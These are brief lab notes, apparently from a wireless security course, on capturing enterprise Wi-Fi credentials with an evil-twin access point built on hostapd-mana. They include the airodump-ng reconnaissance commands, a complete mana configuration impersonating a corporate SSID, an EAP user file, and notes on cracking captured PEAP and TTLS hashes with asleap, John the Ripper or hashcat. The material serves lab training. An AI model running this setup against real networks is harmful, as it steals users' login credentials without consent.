Mana

The aim on the below labs was to retrieve credentials of a client that is using different types of authentication such as PEAP-GTC, PEAP-MSCHAPv2, TTLS-PAP, TTLS-CHAP and TTLS-MSCHAPv2

PEAP-GTC

Set the device into monitor mode and check for networks with airodump-ng

iw dev wlan0 set monitor none

airodump-ng wlan0

Airodump shows that there is a client probing for the BlueDorkCorp network. Create a mana config file as well as the user file.

// mana config
interface=wlan1
ssid=BlueDorkCorp
channel=6
hw_mode=g
wpa=3
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP
auth_algs=3
ieee8021x=1
eapol_key_index_workaround=0
eap_server=1
eap_user_file=hostapd.eap_user
ca_cert=/root/certs/ca.pem
server_cert=/root/certs/server.pem
private_key=/root/certs/server.key
private_key_passwd=
dh_file=/root/certs/dhparam.pem
mana_wpe=1
mana_eapsuccess=1

// user file

* PEAP,TTLS,TLS,MD5,GTC
"t" TTLS-MSCHAPV2,MSCHAPV2,MD5,GTC,TTLS-PAP,TTLS-CHAP,TTLS-MSCHAP "1234test" [2]

Start mana with the config file and observe the plain text creds.

TTLS-MSCHAPv2

Same as above but this time you will need to use asleap to crack the password.

TTLS-CHAP

Same setup as above but you will need to try to crack the password with jtr or hashcat.

TTLS-PAP

Same setup as the first, but creds come in plain text.

PEAP-MSCHAPv2

Same as the initial setup, but need to crack the hash or challenge / response.